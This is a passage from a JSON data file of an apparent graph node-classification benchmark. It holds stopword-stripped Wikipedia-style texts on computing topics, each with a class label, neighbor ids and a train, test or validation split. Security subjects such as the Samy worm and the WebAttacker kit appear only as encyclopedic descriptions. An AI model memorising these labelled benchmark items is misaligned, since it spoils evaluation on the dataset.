homebrew version 2.0.0 released homebrew written ruby programming language targets version ruby comes installed macos operating system default installed codice_1 consists git repository allowing user update homebrew pulling updated repository github package manager builds software source using formulae ruby scripts constructed homebrew domain specific language dsl managing dependencies downloading source files configuring compiling software binary packages called bottles provide pre-built formulae default options homebrew honor default privileges codice_1 directory ownership changed root group permissions wheel group installing user admin group specifically mode changes codice_3 codice_4 files directories ownership changed installer considered major security flaw homebrew collects installation build error operating system version statistics via google analytics possible opt command codice_5 users view analytics data last 30 90 365 days homebrew website",
    "neighbors": [
      6657,
      10760,
      9229,
      7695,
      10771,
      8213,
      6680,
      9245,
      5155,
      5670,
      7722,
      5677,
      564,
      10817,
      3667,
      6227,
      9324,
      9839,
      1138,
      2168,
      7804,
      7293,
      9342,
      6797,
      2191,
      10900,
      10394,
      4775,
      6828,
      4277,
      5819,
      700,
      190,
      6338,
      4302,
      2259,
      6361,
      8413,
      10973,
      741,
      231,
      2281,
      2804,
      6393,
      11525,
      7430,
      7435,
      7947,
      9487,
      788,
      1813,
      5397,
      8476,
      3873,
      811,
      6446,
      7983,
      1842,
      823,
      2872,
      5945,
      1852,
      3393,
      3918,
      4951,
      9564,
      2401,
      9063,
      11625,
      8554,
      10096,
      8068,
      3462,
      8582,
      2955,
      5524,
      6583,
      10172,
      5567,
      9151,
      8644,
      9671,
      11208,
      5578,
      5067,
      5070,
      463,
      11221,
      2010,
      7140,
      6119,
      5096,
      5612,
      1522,
      3573
    ],
    "mask": "Train"
  },
  {
    "node_id": 1380,
    "label": 3,
    "text": "IBM_ThinkPad_UltraPort:ibm thinkpad ultraport ibm ultraport nonstandard usb 1.1 port used ibm range thinkpad laptop computers electronically ultraport connector identical standard usb port ultraport uses proprietary mechanical connection ultraport devices plugged normal usb interface however ultraport devices shipped adapter allowed attached regular usb port select thinkpad models 2000 2002 came ultraport connector top edge laptop screen ibm sold variety laptop-relevant ultraport devices including webcams speakers microphone arrays ultraport designed 1999 response proliferation many laptop computers sony fujitsu others built-in cameras",
    "neighbors": [
      3304,
      9137,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 1381,
    "label": 4,
    "text": "Samy_Kamkar:samy kamkar samy kamkar born december 10 1985 american privacy security researcher computer hacker whistleblower entrepreneur age 16 kamkar dropped high school one year later co-founded fonality unified communications company based open source software raised 46 million private funding possibly best known creating releasing fastest spreading virus time myspace worm samy subsequently raided united states secret service patriot act also known creating skyjack custom drone hacks nearby parrot drones allowing controlled operator creating evercookie appeared top-secret nsa document revealed edward snowden front page new york times also known work wall street journal discovery illicit mobile phone tracking apple iphone google android microsoft windows phone mobile devices transmit gps wi-fi information parent companies mobile research led series class-action lawsuits companies privacy hearing capitol hill 2005 kamkar released samy worm first publicly released self-propagating cross-site scripting worm onto myspace worm carried payload would display string samy hero victim profile cause victim unknowingly send friend request kamkar user viewed profile would payload planted page within 20 hours october 4 2005 release one million users run payload making fastest spreading virus time myspace team temporarily shut myspace fix problem allowed worm operate 2006 kamkar raided united states secret service electronic crimes task force expanded patriot act releasing worm presented plea bargain prison time paying fine 20,000 usd serving three years probation working 720 hours community service kamkar pled guilty felony charge computer hacking los angeles superior court also per aforementioned agreement kamkar allowed keep single unnetworked computer explicitly prohibited internet access sentence since 2008 kamkar independent computer security privacy research consulting 2008 kamkar restriction computers lifted demonstrated weaknesses visa mastercard europay credit cards near field communication nfc radio-frequency identification rfid chips built released software demonstrating ability steal credit card information including name credit card number expiration date wirelessly cards also released code demonstrating wireless identity theft physical access control cards including hid global cards using rfid use credit card sized device removing need computer connected 2010 kamkar traveled dozen countries speaking mobile security research weaknesses discovered cryptanalysis php programming language including speaking largest annual hacker conventions world def con black hat briefings toorcon late 2010 kamkar traveled bratislava attend faraday hack day help expose political corporate corruption within slovakia government early 2011 kamkar joined board directors brave new software non-profit organization originally funded multimillion-dollar u.s. state department grant nonprofit responsible creating uproxy university washington google ideas browser extension intended allow users repressive regimes access internet without monitored nonprofit also created lantern network designed circumvent internet censorship defeat suppression digital information freedom speech addition releasing evercookie free open source software exposing surreptitious collection data apple google microsoft 2011 kamkar also exposed kissmetrics hulu recreating tracking cookies consumers deleted storing unique tracking identifiers flash cookies html5 local storage automatically deleted consumers cleared browser cookies several companies identified performing cookie respawning subsequently sued class-action lawyers january 2013 kissmetrics online advertising network settled cookie respawning related lawsuit 500,000 early 2010 kamkar discovered major flaw versions php programming language specifically pseudorandom number generator allowed attacker hijack session id user take session kamkar released patch fixed released exploit code demonstrating attack possible major banks social networks forums 2010 kamkar released evercookie cookie apparently deleted subsequently documented front page new york times 2013 top-secret nsa document leaked edward snowden citing evercookie method tracking tor users 2011 kamkar discovered iphone android windows phone mobile devices continuously sending gps coordinates correlated wi-fi mac addresses back apple google microsoft respectively released research several front page wall street journal articles iphone would continue send location data even location services turned windows phone would also continue send location data even user given app permission discovered data exposed google released androidmap tool exposing google database wi-fi mac addresses correlated physical coordinates populated android phones 2013 kamkar created skyjack combination open source software hardware run unmanned aerial vehicle engineered autonomously seek hack wirelessly take parrot drones within wifi distance creating army zombie drones entire software hardware specification released open source detailed website software released one day amazon.com announced amazon prime air possible future delivery service using drones deliver small packages early 2015 july 30 2015 kamkar introduced ownstar small electronic device could concealed near general motors vehicle interpose vehicle onstar link driver onstar remotelink app classic man-in-the-middle attack kamkar unauthorized user could substitute onstar commands locate unlock start vehicle august 11 general motors released upgrades onstar server software remotelink app block attacks 2015 reported kamkar built inexpensive electronic device size wallet could concealed near locked vehicle capture single keyless entry code used later time unlock vehicle device transmits jamming signal block vehicle reception rolling code signals owner fob recording signals two attempts needed unlock vehicle recorded first code sent vehicle owner makes second attempt recorded second code retained future use kamkar stated vulnerability widely known years present many vehicle types previously undemonstrated demonstration announced def con 23 november 24 2015 samy kamkar released magspoof portable device spoof/emulate magnetic stripe credit card wirelessly even standard magstripe readers generating strong electromagnetic field emulates traditional magnetic stripe card words magspoof used traditional credit card simply store credit cards modification technically disable chip requirements various form factors used security research area would traditionally require magstripe readers credit cards drivers licenses hotel room keys automated parking lot tickets etc november 16 2016 samy kamkar released poisontap usb ethernet emulator used hijack internet traffic target machine even computer password protected locked backdoored device remotely forced make request user cookies http unsecured websites security flags meaning attacker remotely impersonate local user",
    "neighbors": [
      9732,
      3852,
      1941,
      3495,
      7855,
      9395,
      7739,
      3011,
      8644,
      3704,
      7887,
      4313,
      5087,
      2147,
      2275,
      1254,
      8045,
      6520,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 1382,
    "label": 9,
    "text": "Software_transactional_memory:software transactional memory computer science software transactional memory stm concurrency control mechanism analogous database transactions controlling access shared memory concurrent computing alternative lock-based synchronization stm strategy implemented software rather hardware component transaction context occurs piece code executes series reads writes shared memory reads writes logically occur single instant time intermediate states visible successful transactions idea providing hardware support transactions originated 1986 paper tom knight idea popularized maurice herlihy j. eliot b. moss 1995 nir shavit dan touitou extended idea software-only transactional memory stm since 2005 stm focus intense research support practical implementations growing unlike locking techniques used modern multithreaded applications stm often optimistic thread completes modifications shared memory without regard threads might recording every read write performing log instead placing onus writer make sure adversely affect operations progress placed reader completing entire transaction verifies threads concurrently made changes memory accessed past final operation changes transaction validated validation successful made permanent called commit transaction may also abort time causing prior changes rolled back undone transaction committed due conflicting changes typically aborted re-executed beginning succeeds benefit optimistic approach increased concurrency thread needs wait access resource different threads safely simultaneously modify disjoint parts data structure would normally protected lock however practice stm systems also suffer performance hit compared fine-grained lock-based systems small numbers processors 1 4 depending application due primarily overhead associated maintaining log time spent committing transactions even case performance typically worse twice slow advocates stm believe penalty justified conceptual benefits stm theoretically worst case space time complexity n concurrent transactions n actual needs depend implementation details one make transactions fail early enough avoid overhead also cases albeit rare lock-based algorithms better time complexity software transactional memory addition performance benefits stm greatly simplifies conceptual understanding multithreaded programs helps make programs maintainable working harmony existing high-level abstractions objects modules lock-based programming number well-known problems frequently arise practice contrast concept memory transaction much simpler transaction viewed isolation single-threaded computation deadlock livelock either prevented entirely handled external transaction manager programmer need hardly worry priority inversion still issue high-priority transactions abort conflicting lower priority transactions already committed hand need abort failed transactions also places limitations behavior transactions perform operation undone including i/o limitations typically overcome practice creating buffers queue irreversible operations perform later time outside transaction haskell limitation enforced compile time type system 2005 tim harris simon marlow simon peyton jones maurice herlihy described stm system built concurrent haskell enables arbitrary atomic operations composed larger atomic operations useful concept impossible lock-based programming quote authors perhaps fundamental objection ... lock-based programs compose correct fragments may fail combined example consider hash table thread-safe insert delete operations suppose want delete one item table t1 insert table t2 intermediate state neither table contains item must visible threads unless implementor hash table anticipates need simply way satisfy requirement ... short operations individually correct insert delete composed larger correct operations —tim harris et al. composable memory transactions section 2 background pg.2 stm problem simple solve simply wrapping two operations transaction makes combined operation atomic sticking point unclear caller unaware implementation details component methods attempt re-execute transaction fails response authors proposed retry command uses transaction log generated failed transaction determine memory cells read automatically retries transaction one cells modified based logic transaction behave differently least one value changed authors also proposed mechanism composition alternatives orelse function runs one transaction transaction retry runs second one retry tries soon relevant change made facility comparable features posix networking select call allows caller wait one number events simultaneously also simplifies programming interfaces example providing simple mechanism convert blocking nonblocking operations scheme implemented glasgow haskell compiler conceptual simplicity stms enables exposed programmer using relatively simple language syntax tim harris keir fraser language support lightweight transactions proposed idea using classical conditional critical region ccr represent transactions simplest form atomic block block code logically occurs single instant end block reached transaction committed possible else aborted retried simply conceptual example correct code example behaves incorrectly node deleted list transaction ccrs also permit guard condition enables transaction wait work condition satisfied transaction manager wait another transaction made commit affects condition retrying loose coupling producers consumers enhances modularity compared explicit signaling threads composable memory transactions took step farther retry command discussed time abort transaction wait value previously read transaction modified retrying example ability retry dynamically late transaction simplifies programming model opens new possibilities one issue exceptions behave propagate outside transactions composable memory transactions authors decided abort transaction since exceptions normally indicate unexpected errors concurrent haskell exception could retain information allocated read transaction diagnostic purposes stress design decisions may reasonable settings stm implemented lock-free algorithm use locking two types locking schemes encounter-time locking ennals saha harris memory writes done first temporarily acquiring lock given location writing value directly logging undo log commit-time locking locks memory locations commit phase commit-time scheme named transactional locking ii implemented dice shalev shavit uses global version clock every transaction starts reading current value clock storing read-version every read write version particular memory location compared read-version greater transaction aborted guarantees code executed consistent snapshot memory commit write locations locked version numbers read write locations re-checked finally global version clock incremented new write values log written back memory stamped new clock version increasingly utilized method manage transactional conflicts transactional memory especially stm commitment ordering also called commit ordering co utilized achieving serializability optimistically i.e. without blocking upon conflict locking commit commit order e.g. ramadan et al 2009 zhang et al 2006 serializability basis correctness concurrent transactions transactional memory tens stm articles commit order already published technique encumbered number patents co desired serializability property achieved committing transactions chronological order compatible precedence order determined chronological orders operations conflicts respective transactions enforce co implementation generic local co algorithm needs utilized patent abstract quoted describes general implementation algorithm pre-determined commit order falls category co generic algorithm real-time constraints one problem implementing software transactional memory optimistic reading possible incomplete transaction read inconsistent state read mixture old new values written another transaction transaction doomed abort ever tries commit violate consistency condition enforced transactional system possible temporary inconsistent state cause transaction trigger fatal exceptional condition segmentation fault even enter endless loop following contrived example figure 4 language support lightweight transactions provided x initially neither transaction alters invariant possible transaction read x transaction b updates read transaction b updates causing enter infinite loop usual strategy dealing intercept fatal exceptions abort transaction valid one way deal issues detect transactions execute illegal operations fail terminate abort cleanly another approach transactional locking scheme number stm implementations varying scales quality stability released many liberal licenses include",
    "neighbors": [
      10624,
      4769,
      3876,
      1382,
      3398,
      5031,
      9224,
      4811,
      7148,
      80,
      3705,
      7446,
      7992,
      1049,
      11610,
      7581,
      862,
      11327
    ],
    "mask": "None"
  },
  {
    "node_id": 1383,
    "label": 1,
    "text": "SQuirreL_SQL_Client:squirrel sql client squirrel sql client database administration tool uses jdbc allow users explore interact databases via jdbc driver provides editor offers code completion syntax highlighting standard sql also provides plugin architecture allows plugin writers modify much application behavior provide database-specific functionality features database-independent desktop application written entirely java swing ui components run platform jvm squirrel sql client free open source software distributed gnu lesser general public license squirrel sql project developed team java developers around world led colin bell hosted sourceforge project since 2001 still developed today",
    "neighbors": [
      270,
      11030,
      3096,
      5403,
      9893,
      1579,
      9389,
      10413,
      7983,
      6451,
      6850,
      9177,
      8539,
      7523,
      10340,
      5612,
      2413,
      7022,
      6780,
      9471
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1384,
    "label": 7,
    "text": "Aum_Programming_Language:aum programming language aum programming language multi-paradigm programming language internal research project adapter since 2004 somewhat similar modern c feature set adding aspect-oriented-programming message passing pattern matching la objective-c embarcadero delphi erlang programming language main idea build everything around abstract syntax tree intermediate code a-la java bytecode cil dalvik software code aum modules compiled assemblies .dll/.class files analogue generically serialized abstract-syntax-trees aum supports aspect oriented programming ast pattern matching aspects may injected compiled code currently constructed lexer parser semantic analyzer first code gen basically ast-walking interpreter plans keep working project start using llvm machine code jit compilation one compilation targets native executable vm like c/c++ aum cross-platform development paradigm based 100 written scratch runtime library released open source software targeting linux windows android operating system platforms",
    "neighbors": [
      5154,
      8262,
      10470,
      10537,
      5612,
      5677,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1385,
    "label": 2,
    "text": "LIRS_caching_algorithm:lirs caching algorithm lirs low inter-reference recency set page replacement algorithm improved performance lru least recently used many newer replacement algorithms achieved using reuse distance metric dynamically ranking accessed pages make replacement decision algorithm developed song jiang xiaodong zhang page replacement algorithms rely existence reference locality function major difference among different replacement algorithms locality qualified lirs uses reuse distance page number distinct pages accessed two consecutive references page quantify locality specifically lirs uses last second-to-last references purpose page accessed first time reuse distance infinite contrast lru uses recency page number distinctive pages accessed reference page quantify locality take account up-to-date access history implementation lirs actually uses larger reuse distance recency page metric quantify locality denoted rd-r assuming cache capacity c pages lirs algorithm rank recently accessed pages according rd-r values retain c highly ranked pages cache concepts reuse distance recency visualized t1 t2 page b ’ second-to-last last reference times respectively t3 current time lirs organizes metadata cached pages uncached pages conducts replacement operations described also illustrated example graph lirs deployed mysql since version 5.1 also adopted infinispan data grid platform approximation lirs clock-pro adopted netbsd",
    "neighbors": [
      2250,
      2234,
      7022
    ],
    "mask": "Test"
  },
  {
    "node_id": 1386,
    "label": 2,
    "text": "Input/Output_Control_System:input/output control system input/output control system iocs several packages early ibm entry-level mainframe computers provided low level access records peripheral equipment iocs provides functionality similar file control processor fcp rca 3301 realcom operating system gefrc gecos computers 1950s 1960s typically dealt data organized records either nature media e.g. lines print application requirements iocs intended allow assembler language programmers read write records without worry details various devices blocking logical records physical records iocs provided run time i/o support several compilers computers era often operating systems modern sense application programs called iocs routines resident monitor included macro instructions expanded iocs routines cases iocs designed coexist simultaneous peripheral operations on-line spool software level access higher level provided bios bdos pc world fact iocs support character-oriented i/o versions iocs existed ibm 705 iii 1401/1440/1460 1410/7010 7070/7072/7074 7080 7040/7044/7090/7094 systems heavily influenced data management components operating systems system/360 name iocs carried dos/360 z/vse distinction logical iocs liocs physical iocs piocs although technical details nomenclature different among various iocs packages fundamental concepts concreteness discussion examples article mostly terms 7070 iocs also multiple continuation lines shown ellipses ... n't serve illustrate narrative iocs program must three things discussed subsection 7070 done using 7070 autocoder declarative statements macro instructions iocs supported several classes i/o equipment services offered iocs needed applications e.g. checkpoints label processing iocs program must identify particular devices types services uses 7070 iocs program must specify one diocs statements declarative statements identify index registers reserved use iocs indicate channels used indicate whether program coexist spool provide processing options end diocs statement causes assembly iocs unless preassembled version requested first general form omitted d729 form used iocs packages similar functions provided control cards iocs program must create control block file specifying information unique file 7070 iocs entries file specification table tape files generated dtf statement separate control blocks generated ddf duf statements iocs packages similar functions provided control cards code defines tape file channel 1 called sequential 1301/1302 disk file called dafile card file called consfile iocs program must specify actions wishes perform 7070 iocs done processing macros iocs packages similar functions provided explicit subroutine calls",
    "neighbors": [
      868,
      1515,
      3916,
      7983,
      9331,
      9811,
      1464
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1387,
    "label": 7,
    "text": "GPU_cluster:gpu cluster gpu cluster computer cluster node equipped graphics processing unit gpu harnessing computational power modern gpus via general-purpose computing graphics processing units gpgpu fast calculations performed gpu cluster hardware classification gpu clusters fall two categories heterogeneous homogeneous heterogeneous hardware major ihv used amd nvidia even different models gpu used e.g 8800gt mixed 8800gtx gpu cluster considered heterogeneous homogeneous every single gpu hardware class make model i.e homogeneous cluster comprising 100 8800gts amount memory classifying gpu cluster according semantics largely directs software development cluster different gpus different capabilities utilized interconnect addition computer nodes respective gpus fast enough interconnect needed order shuttle data amongst nodes type interconnect largely depends number nodes present examples interconnects include gigabit ethernet infiniband vendors nvidia provides list dedicated tesla preferred partners tpp capability building delivering fully configured gpu cluster using tesla 20-series gpgpus amax information technologies dell hewlett-packard silicon graphics companies provide complete line gpu clusters systems software components required make many gpu-equipped machines act one include mapping algorithm run gpu cluster somewhat similar mapping algorithm run traditional computer cluster example rather distributing pieces array ram texture divided amongst nodes gpu cluster",
    "neighbors": [
      2594,
      6818,
      1400,
      6916,
      8514,
      9126,
      5384,
      10051,
      10658,
      11487,
      9741,
      1614,
      2838,
      344,
      508,
      7998,
      6495
    ],
    "mask": "Test"
  },
  {
    "node_id": 1388,
    "label": 9,
    "text": "Applicative_programming_language:applicative programming language classification programming languages applicative programming language designed support development programs giving result function combined variables successive functional transformations applied data arrive result language program control total state kept background may also known functional language rather loose sense term lisp ml application programming languages haskell programming paradigm developed applicative functor extends higher-order functional abstraction beyond monad",
    "neighbors": [
      9345,
      3876,
      8262,
      11083,
      2062,
      5081
    ],
    "mask": "Test"
  },
  {
    "node_id": 1389,
    "label": 2,
    "text": "Bill_Atkinson:bill atkinson bill atkinson born 1951 american computer engineer photographer atkinson worked apple computer 1978 1990 atkinson principal designer developer graphical user interface gui apple lisa later one first thirty members original apple macintosh development team creator ground-breaking macpaint application fulfilled vision using computer creative tool also designed implemented quickdraw fundamental toolbox lisa macintosh used graphics quickdraw performance essential success macintosh gui also one main designers lisa macintosh user interfaces atkinson also conceived designed implemented hypercard first popular hypermedia system hypercard put power computer programming database design hands nonprogrammers 1994 atkinson received eff pioneer award contributions received undergraduate degree university california san diego apple macintosh developer jef raskin one professors atkinson continued studies graduate student neurochemistry university washington raskin invited atkinson visit apple computer steve jobs persuaded join company immediately employee 51 atkinson never finished phd around 1990 general magic founding bill atkinson one three cofounders met following press byte magazine obstacles general magic success may appear daunting general magic typical start-up company partners include biggest players worlds computing communications consumer electronics loaded top-notch engineers given clean slate reinvent traditional approaches ubiquitous worldwide communications 2007 atkinson began working outside developer numenta startup working computer intelligence work atkinson said numenta fundamentally important society personal computer rise internet currently atkinson combined passion computer programming love nature photography create art images takes close-up photographs stones cut polished works highly regarded resemblance miniature landscapes hidden within stones atkinson 2004 book within stone features collection close-up photographs highly intricate detailed images creates made possible accuracy creative control digital printing process helped create atkinson noteworthy contributions field computing include atkinson works nature photographer actor nelson franklin portrayed 2013 film jobs",
    "neighbors": [
      576,
      9123,
      9700,
      6234,
      4486,
      2282,
      4844,
      11118,
      6554,
      9999,
      4114,
      9778,
      10386,
      58,
      4251,
      8540,
      4989,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 1390,
    "label": 9,
    "text": "Extempore_(software):extempore software extempore live coding environment focused real-time audiovisual software development designed accommodate demands cyber-physical computing extempore consists two integrated languages scheme extensions extempore language uses llvm cross-language compiler achieve performant digital signal processing related low-level features on-the-fly extempore shares use scheme syntax real-time audiovisual emphasis lead developer andrew sorenson older related project impromptu runs linux mac os x bindings apple libraries absent environment interface dynamic libraries",
    "neighbors": [
      9345,
      10083,
      6797,
      7983,
      11221,
      823,
      7128,
      9210
    ],
    "mask": "Test"
  },
  {
    "node_id": 1391,
    "label": 5,
    "text": "Exterior_gateway_protocol:exterior gateway protocol exterior gateway protocol routing protocol used exchange routing information autonomous systems exchange crucial communications across internet notable exterior gateway protocols include exterior gateway protocol egp obsolete border gateway protocol bgp contrast interior gateway protocol type protocol used exchanging routing information gateways commonly routers within autonomous system example system corporate local area networks routing information used route network-level protocols like ip",
    "neighbors": [
      5472,
      8862,
      2085,
      2206
    ],
    "mask": "Test"
  },
  {
    "node_id": 1392,
    "label": 9,
    "text": "Klaus_Samelson:klaus samelson klaus samelson december 21 1918 – may 25 1980 german mathematician physicist computer pioneer area programming language translation push-pop stack algorithms sequential formula translation computers born strasbourg alsace-lorraine lived breslau early childhood years elder brother mathematician hans samelson due political circumstances waited 1946 study mathematics physics ludwig maximilian university munich munich graduating worked briefly high school teacher returned university completed doctorate degree physics fritz bopp dissertation quantum mechanical problem posed arnold sommerfeld related unipolar induction dr samelson became interested numerical analysis hans piloty electrical engineer robert sauer professor mathematics began working together joined got involved early computers research associate mathematical institute technical university munich changed scientific career first publications came sauer interests dealing supersonic flow precision problems digital computations numerical calculations eigenvalues soon samelson strong influence began development computer science informatics new scientific discipline friedrich l. bauer also fritz bopp ph.d. advisor studied structure programming languages order develop efficient algorithms translation implementation research led bracketed structures became clear samelson principle govern translation programming languages run-time system stack models block structure fundamental breakthrough computer systems modeled designed piloty bauer samelson also worked design perm computer based partially whirlwind concept 1955 perm completed continued work bauer begun 1951 concepts automatic programming samelson played key role design algol 58 algol 60 1958 accepted chair mathematics university mainz since 1963 held chair technical university munich f.l bauer began develop university curriculum informatics computer science involved international standards programming informatics ifip became editor journal acta informatica began 1971",
    "neighbors": [
      512,
      1952,
      4608,
      10983,
      1641,
      1610,
      1611,
      4395,
      5097,
      8813,
      9804,
      1783,
      5496
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1393,
    "label": 4,
    "text": "Webattacker:webattacker webattacker do-it-yourself malware creation kit includes scripts simplify task infecting computers spam-sending techniques lure victims specially rigged websites allegedly created group russian programmers kit demands minimal technical sophistication manipulated used crackers sophos reported webattacker sold hacker web sites network individual resellers includes technical support malware code currently delivered least seven exploits including threats aimed microsoft mdac software mozilla firefox web browser sun microsystems java virtual machine programs exploitation process usually consists following steps software appears updated regularly exploit new flaws flaw discovered september 2006 internet explorer handles certain graphics files",
    "neighbors": [
      736,
      9665,
      10756,
      5872,
      3473,
      8978,
      9780,
      5078,
      7515,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 1394,
    "label": 2,
    "text": "Bradley_M._Kuhn:bradley m. kuhn bradley m. kuhn born 1973 free software activist united states kuhn currently president software freedom conservancy previously executive director 2010 floss community liaison technology director software freedom law center sflc previously served executive director free software foundation fsf 2001 march 2005 elected fsf board directors march 2010 best known efforts gpl enforcement fsf sflc creator fsf license list original author affero general public license long proponent non-profit structures floss development leads efforts direction software freedom conservancy recipient 2012 o'reilly open source award kuhn attended loyola blakefield followed loyola college maryland graduating may 1995 summa cum laude bachelor science computer science kuhn attended graduate school computer science university cincinnati received master science degree 2001 direction graduate advisor john franco kuhn received usenix student grant scholarship thesis work. focused dynamic interoperability free software languages using port perl java virtual machine example larry wall served kuhn thesis committee kuhn thesis showed various problems regarding use stack-based virtual machines perl discovery became part justification launch parrot project kuhn active participant perl6 rfc process headed perl6-licensing committee process rfcs licensing written kuhn taught ap computer science walnut hills high school 1998-1999 academic year using linux-based lab built students kuhn volunteered free software foundation throughout graduate school hired part-time richard stallman assistant january 2000 kuhn seen posting lists professional capacity around time early employment fsf kuhn suggested creation maintained fsf license list page argued license proliferation kuhn also early active member cincinnati linux user group period serving board directors 1998 giving numerous presentations bradley kuhn computer science career briefly involved proprietary software development high school sour experience area one motivations sticking career non-profit work since graduate school kuhn worked non-profits hired full-time work fsf late 2000 promoted executive director march 2001 kuhn launched fsf associate membership campaign formalized gnu general public license gpl enforcement efforts gpl compliance labs led fsf response sco lawsuit authored affero clause original version agpl taught numerous cle classes lawyers gpl kuhn left fsf march 2005 join founding team software freedom law center eben moglen daniel ravicher subsequently established software freedom conservancy april 2006 fsf sflc kuhn involved major efforts united states enforce gpl sflc assisted eben moglen richard stallman richard fontana drafting gplv3 managed production software system gplv3 comment process called stet advocated strongly inclusion affero clause gplv3 assisted production agplv3 fsf decided write separate affero version gplv3 prior 2010 kuhn floss community liaison technical director software freedom law center president software freedom conservancy october 2010 became conservancy first executive director leadership change serves president distinguished technologist karen sandler holds executive director position 2010 kuhn founded replicant project together aaron williamson graziano sorbaioli denis ‘ gnutoo ’ carikli aiming replacing proprietary android components free software counterparts kuhn fact registrant replicant.us domain since october 2010 kuhn co-hosted sandler free freedom podcast covers legal policy issues floss world kuhn sandler previously co-hosted similar podcast software freedom law show kuhn avid poker player played professionally part-time basis 2002-2007 since january 2008 contributor pokersource gpl 'd online poker system written maintained loïc dachary",
    "neighbors": [
      1026,
      2050,
      1028,
      5644,
      2581,
      10780,
      3618,
      6691,
      555,
      2109,
      10817,
      8258,
      10822,
      5703,
      8263,
      589,
      4177,
      8787,
      1112,
      3674,
      8304,
      7793,
      3189,
      5759,
      9343,
      2180,
      7812,
      4230,
      8326,
      9865,
      8848,
      657,
      2195,
      6808,
      1694,
      6302,
      3744,
      8354,
      2724,
      4265,
      6313,
      10922,
      8364,
      1717,
      2233,
      5833,
      6352,
      3802,
      4831,
      7904,
      1761,
      10464,
      3817,
      4841,
      8436,
      7938,
      4360,
      4367,
      1813,
      7450,
      2332,
      10012,
      802,
      5410,
      6947,
      5931,
      6962,
      823,
      11069,
      843,
      11602,
      4437,
      6489,
      9579,
      1396,
      11643,
      8582,
      11654,
      4493,
      10642,
      1939,
      11155,
      3478,
      7584,
      4011,
      11180,
      9646,
      5555,
      9148,
      9660,
      10687,
      5067,
      4561,
      8147,
      2010,
      8671,
      9696,
      8673,
      11232,
      1007,
      3068
    ],
    "mask": "Test"
  },
  {
    "node_id": 1395,
    "label": 5,
    "text": "Port_Aggregation_Protocol:port aggregation protocol port aggregation protocol pagp cisco systems proprietary networking protocol used automated logical aggregation ethernet switch ports known etherchannel pagp proprietary cisco systems similar protocol known lacp — released ieee known 802.3ad 802.1ax recently — industry standard tied specific vendor pagp configured cisco switch operate three different modes cisco network devices running catos single switch module may configured run either lacp pagp modes cisco devices run ios native and/or non-hybrid mode boxes support individual port configuration lacp restricted per module settings catos pagp messages always sent well known cisco multicast address 01-00-0c-cc-cc-cc protocol type code 0x0104 pagp uses multicast group mac address cdp limitation port aggregation protocol physical ports aggregation group must reside switch cisco 6500 4500e platforms remove limitation using virtual switching system vss allows port channels split two chassis port aggregation protocol line speed agport total line speeds physical ports automatically means single transfer use aggregated interfaces bandwidth rather depend distribution method choice cisco switches use src/dst mac address hash distribution method meaning single session use bandwidth single interface cisco switches uses proprietary distribution method enable true frame round-robin enabling maximum link speed sum interfaces composing aggregation group mean packet order altered however plain etherchannel load-balancing works switch assign hash result 0-7 based configured hash method load-balancing algorithm type traffic hash result commonly called result bundle hash rbh divided available links therefore single flow exceed speed physical port however pagp-enabled switches negotiate maximize load balancing preserve ordering link former give maximum aggregated bandwidth expense packet ordering latter assures packet reordering occur limit single transfer bandwidth single interface",
    "neighbors": [
      7049,
      6834,
      7411
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1396,
    "label": 2,
    "text": "Jono_Bacon:jono bacon jono bacon full name jonathan edward james bacon writer software engineer originally united kingdom based california works consultant community strategy bacon started work linux community created linux uk website left project moved join kde team created kde :enterprise website kde usability study bacon started career linux journalist moving 2006 work openadvantage help move organizations open source solutions 4 september 2006 28 may 2014 worked canonical ltd. ubuntu community manager 29 may 2014 30 october 2015 worked xprize senior director community 14 november 2015 may 2016 bacon worked director community github currently works consultant community strategy bacon written variety publications including linux user developer linux format linux magazine mactech macformat pc plus addition magazines also written number books including art community linux desktop hacks php mysql web applications building eight dynamic web sites also co-wrote official ubuntu book benjamin mako hill corey burger jonathan jesse bacon co-founder lugradio bad voltage podcasts co-host floss weekly bacon played several metal bands singer guitarist 2008 2012 defiance guitarist jim adams ran metal band severed fifth released three albums distributed music freely creative commons license",
    "neighbors": [
      1026,
      5644,
      2581,
      10780,
      3618,
      6691,
      2109,
      10817,
      3654,
      8263,
      10822,
      589,
      4177,
      1107,
      8787,
      4192,
      9324,
      7793,
      3189,
      5755,
      7812,
      8326,
      8848,
      657,
      2195,
      6808,
      1694,
      6302,
      8354,
      8364,
      3245,
      1717,
      6352,
      3802,
      4831,
      5343,
      1761,
      4841,
      7913,
      9971,
      5369,
      6397,
      7938,
      4360,
      4367,
      1813,
      7450,
      8476,
      802,
      5410,
      6947,
      5931,
      6445,
      823,
      11069,
      5962,
      843,
      11602,
      4437,
      4951,
      6489,
      5990,
      7020,
      1394,
      2930,
      11643,
      4493,
      10642,
      1939,
      11155,
      11669,
      3478,
      926,
      7584,
      4011,
      9646,
      8112,
      439,
      9660,
      10687,
      5067,
      975,
      8147,
      11221,
      3550,
      9696,
      6625,
      11232,
      7140,
      8177,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 1397,
    "label": 9,
    "text": "Bill_Schelter:bill schelter william frederick schelter 1947 – july 30 2001 professor mathematics university texas austin lisp developer programmer schelter credited development gnu common lisp gcl implementation common lisp gpl 'd version computer algebra system macsyma called maxima schelter authored austin kyoto common lisp akcl contract ibm akcl formed foundation axiom another computer algebra system akcl eventually became gnu common lisp also credited first port gnu c compiler intel 386 architecture used original implementation linux kernel schelter obtained ph.d. mcgill university 1972 mathematical specialties noncommutative ring theory computational algebra applications including automated theorem proving geometry summer 2001 age 54 died suddenly heart attack traveling russia",
    "neighbors": [
      5380,
      9865,
      2062,
      1783,
      6201,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1398,
    "label": 2,
